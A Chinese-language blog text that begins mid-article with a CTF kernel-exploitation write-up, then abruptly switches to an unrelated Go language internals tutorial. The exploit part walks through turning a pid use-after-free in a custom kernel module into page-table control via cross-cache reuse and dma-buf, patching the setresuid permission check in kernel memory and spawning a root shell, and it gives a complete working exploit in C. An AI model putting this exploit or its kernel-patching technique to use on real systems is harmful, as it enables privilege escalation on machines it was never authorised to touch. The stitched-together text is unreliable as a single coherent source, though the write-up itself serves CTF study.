spinlock_t lock;
/* lists of tasks that use this pid */
struct hlist_head tasks[PIDTYPE_MAX];
struct hlist_head inodes;
/* wait queue for pidfd notifications */
wait_queue_head_t wait_pidfd;
struct rcu_head rcu;
struct upid numbers[];
};
  • count 字段是 pid 对象的第一个字段(8 字节对齐),尽管 count 字段大小为 4 个字节,但它恰好与 PTE 的较低 4 字节重合,因此我们可以通过计数器来修改 PTE
  • 由于进程中的 fd 资源有限,它最多只能添加 32768 进行计数,为了打破这个限制,我们可以利用 fork 在多个进程中执行增量原语,此操作允许我们向受害者 PTE 添加足够大的数字

我们可以通过 mmap 来快速分配大量页表:

1
2
3
4
5
6
7
8
9
10
11
void *page_spray[N_PAGESPRAY];
for (int i = 0; i < N_PAGESPRAY; i++) {
page_spray[i] = mmap((void*)(0xdead0000UL + i*0x10000UL),
0x8000, PROT_READ|PROT_WRITE,
MAP_SHARED|MAP_ANONYMOUS, -1, 0);
if (page_spray[i] == MAP_FAILED) fatal("mmap");
}

for (int i = start; i < N_PAGESPRAY; i++)
for (int j = 0; j < 8; j++)
*(char*)(page_spray[i] + j*0x1000) = 'A' + j;
  • Linux 内核是惰性的,当 mmap 创建内存时并不会为其绑定页表,只有在第一次读写时才会通过缺页处理来进行绑定

在某些情况下,内核空间和用户空间需要共享一些物理页面,实现的机制很多但这里选择 dma-buf 系统堆:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
dma_heap_fd = creat("/dev/dma_heap/system", O_RDWR);;
if(dma_heap_fd == -1)
err_exit("creat");

struct dma_heap_allocation_data data;
data.len = 0x1000;
data.fd_flags = O_RDWR;
data.heap_flags = 0;
data.fd = 0;

if (ioctl(dma_heap_fd, DMA_HEAP_IOCTL_ALLOC, &data) < 0) {
perror("DMA_HEAP_IOCTL_ALLOC");
return -1;
}
int dma_buf_fd = data.fd;
  • 共享页面由用户空间中的 dma_buf_fd 表示,可以通过 mmap 将共享页面映射到用户空间
  • 从 dma-buf 系统堆分配的共享页面基本上是从页面分配器分配的(实际上 dma-buf 子系统调整页面池进行优化,但这在利用时不会打扰我们,所以这里不再讨论)

入侵思路

由于开启了 CONFIG_SLAB_MERGE_DEFAULT 选项,UAF 对象 pid 和普通 slab 隔离,这里需要一种 Cross Cache UAF 的技术

  • 这里使用的技术和页级堆风水实现 Cross Cache Overflow 的有所不同
  • 但利用伙伴系统回收整个页面的思路是一致的

在 free victim slab 之后,free 掉同页面其他 object,再满足一系列条件就可以让整个 page 被 buddy system 回收:

  • 目标 object 所在的 page 不是 s->cpu_slab->page
  • 目标 object 所在 page 满足 page->pobjects > (s)->cpu_partial
  • 目标 object 所在 page 位于 freelistpage.inuse 为 “0”

触发方法:(参考文章:Linux 内核利用技巧: Slab UAF to Page UAF-安全客

  • 创建一批 objects 占满 cpu_partial + 2 个 pages,保证 free 的时候 page->pobjects > (s)->cpu_partial
  • 创建 objects 占据一个新的 page,但不占满,保证 c->page 指向这个 page
  • free 掉目标 page 的所有 objects,使这个 page 的 page.inuse == 0
  • 剩下的每个 page free 一个 object 用完 partial list 后就会 free 掉目标 page

查看基本信息:

1
2
3
4
5
6
/home/ctf # cat /sys/kernel/slab/pid/object_size // 每个object的大小
112
/home/ctf # cat /sys/kernel/slab/pid/objs_per_slab // 每个slab中可容纳多少object
32
/home/ctf # cat /sys/kernel/slab/pid/cpu_partial // cpu partial list最大阈值
120
  • 可以通过 sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set)cpu_partial 降低为“8”

入侵的第一步是整理 pid slab,为此我们需要大量调用 fork 来申请足够的 pid 直到 pid slab 耗尽,进而向伙伴系统申请空间

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
for(int i=0;i<2*objs_per_slab;i++){ // alloc 2 pages
child_pid[i] = fork();
if(child_pid[i] < 0){
err_exit("fork");
}
else if(child_pid[i] > 0){
sleep(0.01);
continue;
}
else{
char sync;
read(normal_pipe[i][0], &sync, 1);
if (sync == 'C') {
exit(-1);
}
}
}
  • 先申请 2 个 page 大小的 pid slab

接下来可以调用内核模块的 UAF,申请剩下 cpu_partial 个 page 大小的 pid slab:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
kernel_fork();
if(pid == getpid()){ // parent
kernel_dele();

/* <----- 保证 free 的时候 page->pobjects > (s)->cpu_partial -----> */
for(int i = 2 * objs_per_slab; i < PID_NUM; i++){ // alloc cpu_partial pages
child_pid[i] = fork();
if(child_pid[i] < 0){
err_exit("fork");
}
else if(child_pid[i] > 0){
sleep(0.01);
continue;
}
else{
char sync;
read(normal_pipe[i][0], &sync, 1);
if (sync == 'C') {
exit(-1);
}
else if (sync == 'A') {
add_to_refcount(128, listensock);
while (1) sleep(1);
}
else if (sync == 'B') {
add_to_refcount(127, listensock);
while (1) sleep(1);
}
}
}
/* ------------------------------------------------------------ */

void *page_spray[N_PAGESPRAY];
for (int i = 0; i < N_PAGESPRAY; i++) {
page_spray[i] = mmap((void*)(0xdead0000UL + i*0x10000UL),
0x8000, PROT_READ|PROT_WRITE,
MAP_SHARED|MAP_ANONYMOUS, -1, 0);
if (page_spray[i] == MAP_FAILED)
err_exit("mmap");
}

......

}
else{ // child
char sync;
read(child_pid[0], &sync, 1);
if (sync == 'C') {
prctl(PR_SET_PDEATHSIG, SIGKILL);
/* create post-death-incrementable pid reference */
listen(listensock, 128 /*SOMAXCONN*/);
write(child_pid[1], "D", 1);
while (1) {
sleep(1);
}
}
}
  • UAF slab 将会是这些页面中的其中一个 pid
  • 这里选择使用 AF_UNIX socket 来修改 pid->count
    • 子进程开启监听
    • 父进程通过 connect 来增加 pid->count
  • 由内核模块生成的子进程将是控制 UAF slab 的关键,需要专门创建两个管道来维持父子进程的通信

接下来我们需要将 UAF pid 释放掉,并用 PTE 将其覆盖,主要就是满足 pid page 被伙伴系统回收的条件:

1
2
3
4
5
6
/* <----- free 掉目标 page 的所有 objects && 剩下的每个 page free 一个 object -----> */
for (int i = 0; i < objs_per_slab * (cpu_partial-1) + 1; i++) { // free cpu_partial-1 pages + 1 pid
sleep(0.2);
write(normal_pipe[i][1], "C", 1);
}
/* ----------------------------------------------------------------------------- */
  • 被伙伴系统回收的条件即将满足(除了最后一个 page 为半满,其他的都为空)
1
2
3
4
5
6
7
8
9
10
11
int start = 0;
for (int i = objs_per_slab * 7 + 1; i < objs_per_slab * 8; i++) {
sleep(0.2);
printf("i = %d\n",i);
write(normal_pipe[i][1], "C", 1);

for (int i = start; i < start + N_PADDINGS; i++)
for (int j = 0; j < 8; j++)
*(char*)(page_spray[i] + j*0x1000) = 'A' + j;
start += N_PADDINGS;
}
  • 接下来释放的每一个 pid 都有可能导致带有 UAF pid 的 page 被伙伴系统回收
  • 我们需要一边释放一边用 PTE 来占用 UAF pid

现在可控的 UAF pid 已经被某个 PTE 占据,我们可以先用增量原语修改这个 PTE 条目,然后将命中的 PTE 堆喷出来:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
for (int i = objs_per_slab * 8; i < objs_per_slab * 9 - 1; i++) { // 128*31 + 127 = 4095
sleep(0.2);
write(normal_pipe[i][1], "A", 1);
}
sleep(0.2);
write(normal_pipe[(objs_per_slab * 9 - 1)][1], "B", 1);

sleep(1);

void *evil = NULL;
for (int i = 0; i < N_PAGESPRAY; i++) {
//print_hex(page_spray[i],8);
if (*(char*)(page_spray[i]) != 'A') {
evil = page_spray[i];
printf("Found overlapping page: %p\n", evil);
break;
}
}
if (evil == NULL)
err_exit("target not found :(");

使用 munmap 释放 PTE,然后用 dma-buf 占据 UAF pid:

1
2
3
4
5
6
7
8
9
10
11
munmap(evil, 0x1000);
void *dmabuf = mmap(evil, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE, dma_data_fd, 0);
*(char*)dmabuf = '0';

for (int i = objs_per_slab * 9 ; i < objs_per_slab * 10; i++) { // 128*32 = 4096
sleep(0.2);
write(normal_pipe[i][1], "A", 1);
}

sleep(1);
printf("DMA-BUF now points to PTE: 0x%lx\n", *(size_t*)dmabuf);

如果我们执行增量原语,将 0x1000、0x2000、0x3000 等添加到受害者 PTE 中,我们将有很大的机会使受害者 PTE 与用户页表相关联:

1711709601881

  • 通过增量使 victim PTE 索引到另一个 PTE
  • 该 PTE 极有可能为 page_spray[i] 中某个页面的页表项

通过 victim PTE 修改页表项为内核代码段的页表项,堆喷并泄露数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
char *victim_ptable = NULL;
*(size_t*)dmabuf = 0x800000000009c067;
for (int i = 0; i < N_PAGESPRAY; i++) {
if (page_spray[i] == evil) continue;
if (*(size_t*)page_spray[i] > 0xffff) {
victim_ptable = page_spray[i];
printf("Found victim page table: %p\n", victim_ptable);
break;
}
}

size_t phys_base = ((*(size_t*)victim_ptable) & ~0xfff) - PHYSICAL_OFFSET;
printf("Physical kernel base address: 0x%lx\n", phys_base);

最后调整好偏移,修改 setresuid 函数的权限检查逻辑即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <stdint.h>
#include <ctype.h>
#include <sys/un.h>

#include "kernelpwn.h"

#define STARTUP_64 (0xffffffff81000000UL)
#define __SYS_SETRESUID_OFF (0xffffffff81096ac0 - STARTUP_64) // __sys_setresuid -- 0xffffffff81096ac0
#define PATCH_JNE_OFFSET (0xffffffff81096bfd + 1 - STARTUP_64 - __SYS_SETRESUID_OFF) // je: 0x0f, 0x84

#define DMA_HEAP_IOCTL_ALLOC 0xc0184800
#define PHYSICAL_OFFSET 0x1c04000

#define object_size 112
#define objs_per_slab 32
#define cpu_partial 8

int fd;
int dma_heap_fd;
int dma_data_fd;
int listensock;
int pid;

struct argg {
char* buf;
};

void kernel_fork()
{
struct argg arg = { .buf = 0};
ioctl(fd, 0x47001, &arg);
}

void kernel_dele()
{
struct argg arg = { .buf = 0 };
ioctl(fd, 0x69003, &arg);
}

void kernel_show(char* buf)
{
struct argg arg = { .buf = buf };
ioctl(fd, 0x58002, &arg);
}

struct sockaddr_un unix_addr = {
.sun_family = AF_UNIX,
.sun_path = "/tmp/exploitsocket"};

int init_socket(){
listensock = socket(AF_UNIX, SOCK_STREAM, 0);
unlink(unix_addr.sun_path);
bind(listensock, (struct sockaddr *)&unix_addr, sizeof(unix_addr));
}

void add_to_refcount(int count, int listensock)
{
for (int i = 0; i < count; i++) {
// logd("Adding to refcount: %", i);
int refsock = socket(AF_UNIX, SOCK_STREAM, 0);
connect(refsock, (struct sockaddr *)&unix_addr, sizeof(unix_addr));
accept(listensock, NULL, NULL);
}
}

struct dma_heap_allocation_data {
uint64_t len;
uint32_t fd;
uint32_t fd_flags;
uint64_t heap_flags;
};

int init_dma_buf(){
dma_heap_fd = creat("/dev/dma_heap/system", O_RDWR);;
if(dma_heap_fd == -1)
err_exit("creat");

struct dma_heap_allocation_data data;
data.len = 0x1000;
data.fd_flags = O_RDWR;
data.heap_flags = 0;
data.fd = 0;

if (ioctl(dma_heap_fd, DMA_HEAP_IOCTL_ALLOC, &data) < 0) {
perror("DMA_HEAP_IOCTL_ALLOC");
return -1;
}
return data.fd;
}

#define PID_NUM ((cpu_partial+2) * objs_per_slab) // 占满 cpu_partial + 2 个 pages
#define N_PADDINGS (objs_per_slab * 6)
#define N_PAGESPRAY (N_PADDINGS * 20 * 2)

int child_pid[PID_NUM];
int parent_pipe[2];
int child_pipe[2];
int normal_pipe[PID_NUM][2];

int init_pipe(){
pipe(parent_pipe); // parent
pipe(child_pipe); // child
for(int i = 0; i < PID_NUM; i++){
if(pipe(normal_pipe[i]) == -1){
err_exit("pipe");
}
}
}

int main(int argc, char** argv, char** envp)
{
bind_core(0);

fd = open("/dev/kpid", O_RDWR);
if(fd == -1)
err_exit("open");

init_pipe();
init_socket();

struct sigaction act;
act.sa_handler = SIG_IGN;
sigemptyset(&act.sa_mask);
act.sa_flags = SA_NOCLDWAIT;
sigaction(SIGCHLD, &act, NULL);

pid = getpid();

for(int i=0; i < 2 * objs_per_slab; i++){ // alloc 2 pages
child_pid[i] = fork();
if(child_pid[i] < 0){
err_exit("fork");
}
else if(child_pid[i] > 0){
sleep(0.01);
continue;
}
else{
char sync;
read(normal_pipe[i][0], &sync, 1);
if (sync == 'C') {
exit(-1);
}
}
}

kernel_fork();
if(pid == getpid()){ // parent
kernel_dele();

/* <----- 保证 free 的时候 page->pobjects > (s)->cpu_partial -----> */
for(int i = 2 * objs_per_slab; i < PID_NUM; i++){ // alloc cpu_partial pages
child_pid[i] = fork();
if(child_pid[i] < 0){
err_exit("fork");
}
else if(child_pid[i] > 0){
sleep(0.01);
continue;
}
else{
char sync;
read(normal_pipe[i][0], &sync, 1);
if (sync == 'C') {
exit(-1);
}
else if (sync == 'A') {
add_to_refcount(128, listensock);
while (1) sleep(1);
}
else if (sync == 'B') {
add_to_refcount(127, listensock);
while (1) sleep(1);
}
}
}
/* ------------------------------------------------------------ */

void *page_spray[N_PAGESPRAY];
for (int i = 0; i < N_PAGESPRAY; i++) {
page_spray[i] = mmap((void*)(0xdead0000UL + i*0x10000UL),
0x8000, PROT_READ|PROT_WRITE,
MAP_SHARED|MAP_ANONYMOUS, -1, 0);
if (page_spray[i] == MAP_FAILED)
err_exit("mmap");
}

/* <----- free 掉目标 page 的所有 objects && 剩下的每个 page free 一个 object -----> */
for (int i = 0; i < objs_per_slab * (cpu_partial-1) + 1; i++) { // free cpu_partial-1 pages + 1 pid
sleep(0.2);
write(normal_pipe[i][1], "C", 1);
}
/* ----------------------------------------------------------------------------- */

sleep(1);

int start = 0;
for (int i = objs_per_slab * 7 + 1; i < objs_per_slab * 8; i++) {
sleep(0.2);
printf("i = %d\n",i);
write(normal_pipe[i][1], "C", 1);

for (int i = start; i < start + N_PADDINGS; i++)
for (int j = 0; j < 8; j++)
*(char*)(page_spray[i] + j*0x1000) = 'A' + j;
start += N_PADDINGS;
}

sleep(1);

dma_data_fd = init_dma_buf();

for (int i = start; i < N_PAGESPRAY; i++)
for (int j = 0; j < 8; j++)
*(char*)(page_spray[i] + j*0x1000) = 'A' + j;

write(child_pipe[1], "C", 1);
while (1) {
char sync;
read(parent_pipe[0], &sync, 1);
if (sync == 'D') {
break;
}
}

for (int i = objs_per_slab * 8; i < objs_per_slab * 9 - 1; i++) { // 128*31 + 127 = 4095
sleep(0.2);
write(normal_pipe[i][1], "A", 1);
}
sleep(0.2);
write(normal_pipe[(objs_per_slab * 9 - 1)][1], "B", 1);

sleep(1);

void *evil = NULL;
for (int i = 0; i < N_PAGESPRAY; i++) {
//print_hex(page_spray[i],8);
if (*(char*)(page_spray[i]) != 'A') {
evil = page_spray[i];
printf("Found overlapping page: %p\n", evil);
break;
}
}
if (evil == NULL)
err_exit("target not found :(");

munmap(evil, 0x1000);
void *dmabuf = mmap(evil, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE, dma_data_fd, 0);
*(char*)dmabuf = '0';

for (int i = objs_per_slab * 9 ; i < objs_per_slab * 10; i++) { // 128*32 = 4096
sleep(0.2);
write(normal_pipe[i][1], "A", 1);
}

sleep(1);
printf("DMA-BUF now points to PTE: 0x%lx\n", *(size_t*)dmabuf);

char *victim_ptable = NULL;
*(size_t*)dmabuf = 0x800000000009c067;
for (int i = 0; i < N_PAGESPRAY; i++) {
if (page_spray[i] == evil) continue;
if (*(size_t*)page_spray[i] > 0xffff) {
victim_ptable = page_spray[i];
printf("Found victim page table: %p\n", victim_ptable);
break;
}
}

size_t phys_base = ((*(size_t*)victim_ptable) & ~0xfff) - PHYSICAL_OFFSET;
printf("Physical kernel base address: 0x%lx\n", phys_base);

size_t phys_func = phys_base + __SYS_SETRESUID_OFF;
*(size_t*)dmabuf = (phys_func & ~0xfff) | 0x8000000000000067;

// 84 0E 01 00 00 E8 18 73 01 00 48 85 C0 0F 84 CD
print_hex(victim_ptable + ((__SYS_SETRESUID_OFF + PATCH_JNE_OFFSET) & 0xfff), 0x10);
victim_ptable[(__SYS_SETRESUID_OFF + PATCH_JNE_OFFSET) & 0xfff] = 0x85; // jne
print_hex(victim_ptable + ((__SYS_SETRESUID_OFF + PATCH_JNE_OFFSET) & 0xfff), 0x10);
// getchar();

printf("Whoami");
system("id");
setresuid(0, 0, 0);

system("/bin/sh");
}
else{ // child
char sync;
read(child_pipe[0], &sync, 1);
if (sync == 'C') {
prctl(PR_SET_PDEATHSIG, SIGKILL);
/* create post-death-incrementable pid reference */
listen(listensock, 128 /*SOMAXCONN*/);
write(parent_pipe[1], "D", 1);
while (1) {
sleep(1);
}
}
}

return 0;
}

Go 是一种新的语言,一种并发的、带垃圾回收的、快速编译的语言,结合了解释型语言的游刃有余,动态类型语言的开发效率,以及静态类型的安全性

查看二进制文件的 go 语言版本:

1
go version test

数据结构

基本类型

1
2
3
4
5
6
7
8
9
10
11
12
13
package main

import "log"

func main() {
i := 1234
j := int32(1)
f := float32(3.14)
bytes := [5]byte{'h', 'e', 'l', 'l', 'o'}
primes := [4]int{2, 3, 5, 7}

log.Fatalf("%d %d %f %s %v", i, j, f, bytes, primes)
}
  • 基础类型 go 与 c 几乎一致

结构体和指针

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
package main

import "fmt"

type Point struct{ X, Y int }
type Rect1 struct{ Min, Max Point }
type Rect2 struct{ Min, Max *Point }

func main() {
point := Point{1, 2} // 生成结构体
pointp := &Point{1, 2} // 生成结构体,生成结构体指针指向该结构体

fmt.Println(point.X, point.Y, point, pointp.X, pointp.Y, pointp)

r1 := Rect1{Point{1, 2}, Point{3, 4}}
r2 := Rect2{&Point{1, 2}, &Point{3, 4}}
fmt.Println(r1, r2, r2.Max, r2.Min)
}
1
2
1 2 {1 2} 1 2 &{1 2}
{{1 2} {3 4}} {0xc00001e100 0xc00001e110} &{3 4} &{1 2}
  • 不同于 c 语言 go 对指针进行了限制,生成指针后必须为其赋值

字符串

1
2
3
4
5
6
7
8
9
10
package main

import "fmt"

func main() {
s := "hello" // ptr=&"hello",len=5
t := s[2:3] // ptr=&"llo",len=1

fmt.Println(s, t)
}
  • 字符串在 go 语言内存模型中用一个 16 字节的数据结构表示,它包含一个指向字符串存储数据的指针和一个长度数据
  • 因为 string 类型是不可变的,对于多字符串共享同一个存储数据是安全的

切片和数组

1
2
3
4
5
6
7
8
9
10
package main

import "fmt"

func main() {
x := []int{1, 2, 3, 4, 5} // 创建一个包含五个值的数组
y := x[1:3] // 并不分配更多的数据,生成一个新的slice结构来引用相同的存储数据

fmt.Println(x, y)
}
1
[1 2 3 4 5] [2 3]
  • 切片是对数组的一个连续片段的引用,片段可以是整个数组,也可以是数组的一部分
  • 在内存中,它是一个包含3个域的结构体:(数组的 slice 并不会实际复制一份数据,它只是创建一个新的数据结构)
    • 指向 slice 中第一个元素的指针
    • slice 的长度(下标操作的上界)
    • slice 的容量(分割操作的上界)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
package main

import "fmt"

func fun1(x []int) {
x[0] = 100
x = append(x, 6) /* 发生扩容,生成新的空间 */
x[1] = 200
fmt.Println(x)
}

func main() {
x := []int{1, 2, 3, 4, 5}
fmt.Println(x)

fun1(x)
fmt.Println(x)
}
1
2
3
[1 2 3 4 5]
[100 200 3 4 5 6]
[100 2 3 4 5]
  • 在对 slice/array 进行 append 等操作时,可能会造成 slice 的自动扩容规则为:
    • 如果新的大小是当前大小2倍以上,则大小增长为新大小
    • 否则循环以下操作:如果当前大小小于1024,按每次2倍增长,否则每次按当前大小1/4增长,直到增长的大小超过或等于新大小
  • 扩容时生成了新的空间,导致 x[1] = 200 没有写入 main 中的数组
  • 另外 main 中的 x 和 fun1 中的 x 是两个不同的对象,它们指向同一个数组但却拥有彼此独立的长度(main 中的 x 长度为 “5”,fun1 中的 x 长度为 “6”)

映射

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
package main

import "fmt"

func main() {
var m = make(map[string]int)

fmt.Printf("Map len = %d\n", len(m))

m["zero"] = 0
m["one"] = 1
m["two"] = 2

fmt.Printf("Map len = %d\n", len(m))

fmt.Printf("zero = %T, %v\n", m["zero"], m["zero"])
fmt.Printf("one = %T, %v\n", m["one"], m["one"])
fmt.Printf("two = %T, %v\n", m["two"], m["two"])
}
1
2
3
4
5
Map len = 0
Map len = 3
zero = int, 0
one = int, 1
two = int, 2
  • Map 是一种键值对的无序集合(go 中的 map 在底层是用哈希表实现的)

动态内存分配 make 和 new

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
package main

import (
"fmt"
"sync"
)

func main() {
u := new(user)
s := make([]int, 5, 100)

fmt.Println(u)
fmt.Println(s)
}

type user struct {
lock sync.Mutex
name string
age int
}

对于动态内存申请,go 有两个不同的关键字 make 和 new:

  • make 的作用是初始化内置的数据结构(slice ,map,channel)
  • new 的作用是根据传入的类型分配一片内存空间并返回指向这片内存空间的指针
1
2
3
4
0x4804e0 <main.main+32>    call   40c100h                       <runtime[newobject]> /* new */

RAX 0x48f5e0 (type:*+58848) ◂— 0x20 /* ' ' */
RBX 0x0
1
2
3
4
5
0x480500 <main.main+64>    call   445fa0h                       <runtime[makeslice]> /* make */

RAX 0x487e80 (type:*+28288) ◂— 0x8
RBX 0x5
RCX 0x64

函数调用

调用约定

1
2
3
4
5
6
7
8
9
10
11
12
13
package main

import (
"fmt"
)

func addtest(a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11, a12, a13, a14, a15 uint64) {
fmt.Println(a1 + a2 + a3 + a4 + a5 + a6 + a7 + a8 + a9 + a10 + a11 + a12 + a13 + a14 + a15)
}

func main() {
addtest(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15)
}
1
2
3
4
5
6
0x4805f8 <main.main+24>    mov    qword ptr [rsp], 0ah
0x480600 <main.main+32> mov qword ptr [rsp + 8], 0bh
0x480609 <main.main+41> mov qword ptr [rsp + 10h], 0ch
0x480612 <main.main+50> mov qword ptr [rsp + 18h], 0dh
0x48061b <main.main+59> mov qword ptr [rsp + 20h], 0eh
0x480624 <main.main+68> mov qword ptr [rsp + 28h], 0fh
1
2
3
4
5
6
0x48062d <main.main+77>     mov    eax, 1                        <main.main>
0x480632 <main.main+82> mov ebx, 2
0x480637 <main.main+87> mov ecx, 3
0x48063c <main.main+92> mov edi, 4
0x480641 <main.main+97> mov esi, 5
0x480646 <main.main+102> mov r8d, 6
  • 前9个参数进入寄存器,后续参数存放入栈中
1
2
3
4
5
6
00:0000│ rsp 0xc00007cef0 —▸ 0x480665 (main.main+133) ◂— mov    rbp, qword ptr [rsp + 78h]
01:00080xc00007cef8 ◂— 0xa /* '\n' */
02:00100xc00007cf00 ◂— 0xb /* '\x0b' */
03:00180xc00007cf08 ◂— 0xc /* '\x0c' */
04:00200xc00007cf10 ◂— 0xd /* '\r' */
05:00280xc00007cf18 ◂— 0xe

多值返回

1
2
3
4
5
6
7
8
9
10
11
12
13
package main

import (
"fmt"
)

func retest() (int, int, int) {
return 1, 2, 3
}

func main() {
fmt.Println(retest())
}
1
2
3
4
5
6
7
8
9
RAX  0x498948 (go:string.*+1328) ◂— 0x3131313131313131 ('11111111')
RBX 0x7
RCX 0x498956 (go:string.*+1342) ◂— 0x3332323232323232 ('22222223')
RDX 0x8
RDI 0x7
RSI 0x49895d (go:string.*+1349) ◂— 0x3933333333333333 ('33333339')
R8 0x7
R9 0x0
R10 0x60
  • 返回值会使用9个寄存器,剩下的存储在栈中

闭包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
package main

import "fmt"

func incSeq() func() int {
var i = 0
return func() int { /* 这个函数中本身没有定义变量i,而是引用了它所在的环境中的变量i */
i++
return i
}
}

func main() {
next := incSeq()

fmt.Printf("start = %d\n", next())

for i := 1; i <= 5; i++ {
fmt.Printf("index(%d) = %d\n", i, next())
}
}
1
2
3
4
5
6
start = 1
index(1) = 2
index(2) = 3
index(3) = 4
index(4) = 5
index(5) = 6
  • 闭包是由函数及其相关引用环境组合而成的实体
  • 返回闭包时并不是单纯返回一个函数,而是返回了一个结构体,记录有函数的返回地址和引用环境中的变量地址
  • 最后还有一个小问题,var i = 0 原本应该分配到栈上,但 go 编译器会自动识别这种情况并将其分配到堆上
1
2
3
4
5
6
7
8
9
10
11
12
13
14
package main

func incSeq() func() int {
var i = 0
return func() int {
i++
return i
}
}

func main() {
next := incSeq()
next()
}
1
go build --gcflags=-m test.go
  • 使用 escape analyze
1
2
3
4
5
6
7
8
9
# command-line-arguments
./test.go:3:6: can inline incSeq
./test.go:5:9: can inline incSeq.func1
./test.go:12:16: inlining call to incSeq
./test.go:5:9: can inline main.func1
./test.go:13:6: inlining call to main.func1
./test.go:4:6: moved to heap: i /* 被转移到堆空间 */
./test.go:5:9: func literal escapes to heap
./test.go:12:16: func literal does not escape

关键字-go

go 语言支持并发,我们只需要通过 go 关键字来开启 goroutine(协程,轻量级线程)即可

  • 协程:子程序调用总是一个入口,一次返回,一旦退出即完成了子程序的执行
1
2
3
4
5
6
7
8
9
10
11
12
package main

import "fmt"

func gotest(a, b, c int) int {
fmt.Println(a, b, c)
return a + b + c
}

func main() {
go gotest(1, 2, 3)
}
  • go 关键字的底层其实是调用 runtime.newproc 函数
1
0x4805e0 <main.main+32>    call   43bc80h                       <runtime[newproc]>
1
2
3
RAX  0x4a0970 (go:func.*+552) —▸ 0x480600 (main.main.func1) ◂— cmp    rsp, qword ptr [r14 + 10h]
RBX 0x0
RCX 0x0
  • 函数 runtime.newproc 负责启动一个新的线程(协程),新建一个栈空间,将栈参数拷贝到新栈空间中并让栈指针指向参数
  • 另外编译器会为 gotest 生成一个辅助函数,IDA 分析如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
void __golang main_main_func1()
{
__int64 v0; // rbp
int v1; // r14
char **v2; // r12
__int64 v3[4]; // [rsp-18h] [rbp-20h] BYREF
void *retaddr; // [rsp+8h] [rbp+0h] BYREF
char v5; // [rsp+10h] [rbp+8h] BYREF

if ( (unsigned int)&retaddr <= *(_QWORD *)(v1 + 16LL) )
runtime_morestack_noctxt();
v3[3LL] = v0;
v2 = *(char ***)(v1 + 32LL);
if ( v2 && *v2 == &v5 )
*v2 = (char *)v3;
main_gotest(v3[0LL], v3[1LL], v3[2LL]); /* 执行原函数 */
}

关键字-defer

defer 用于资源的释放,会在函数返回之前进行调用(defer 语句保证了不论是在正常情况下,还是非正常情况下,函数或方法都能够执行)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
package main

func A() {
defer println("1")
defer func() {
defer println("2")
}()
defer println("3")
println("start")
}

func main() {
A()
}
1
2
3
4
start
3
2
1
  • 在 return 之前,程序会调用 defer 表达式
  • 如果有多个 defer 表达式,调用顺序类似于栈,越后面的 defer 表达式越先被调用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
package main

import "fmt"

func f() (result int) {
defer func() {
result++
}()
return 0
}
func f2() (r int) {
t := 5
defer func() {
t = t + 5
}()
return t
}
func f3() (r int) {
defer func(r int) {
r = r + 5
}(r)
return 1
}
func main() {
fmt.Println(f())
fmt.Println(f2())
fmt.Println(f3())
}
1
2
3
1
5
1
  • return 这一条语句并不是一条原子指令,它拥有赋值和返回两个步骤,而 defer 语句则会在这两个步骤之间运行
  • 因此上面的样例可以等价修改成下面的代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
package main

import "fmt"

func f() (result int) {
result = 0
defer func() {
result++
}()
return /* 返回值为'1' */
}
func f2() (r int) {
t := 5
r = t
defer func() {
t = t + 5
}()
return /* 返回值为'5' */
}
func f3() (r int) {
r = 1
defer func(r int) {
r = r + 5
}(r)
return /* 返回值为'1' */
}
func main() {
fmt.Println(f())
fmt.Println(f2())
fmt.Println(f3())
}
  • 编译器会先为每个 defer 语句生成一个辅助函数,然后在返回值赋值以后函数执行 ret 指令之前调用该函数
1
0x458096 <main[A]+86>     call   458100h                       <main.A.func1>

分段栈和连续栈

goroutine 可以初始时只给栈分配很小的空间,然后随着使用过程中的需要自动地增长

